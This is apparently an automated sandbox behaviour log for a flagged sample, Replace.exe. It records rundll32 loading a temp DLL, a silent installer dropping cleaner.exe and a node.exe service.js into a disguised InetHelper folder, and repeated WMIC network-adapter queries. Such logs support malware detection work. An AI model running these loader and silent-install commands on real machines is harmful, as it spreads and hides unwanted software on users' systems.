Source: Replace.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Replace.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: Replace.exeReversingLabs: Detection: 28%
Source: Replace.exeVirustotal: Detection: 49%
Source: rundll32.exeString found in binary or memory: /downloads/winapp/latest-installer.exe
Source: C:\Users\user\Desktop\Replace.exeFile read: C:\Users\user\Desktop\Replace.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Replace.exe "C:\Users\user\Desktop\Replace.exe"
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe .\run.exe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsA071.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=btJump to behavior
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe .\run.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsA071.tmp wscsu.exe /S /VERPOSTFIX=btJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=btJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp wscsu.exe /S /VERPOSTFIX=btJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0PJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Users\user\Desktop\Replace.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Replace.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
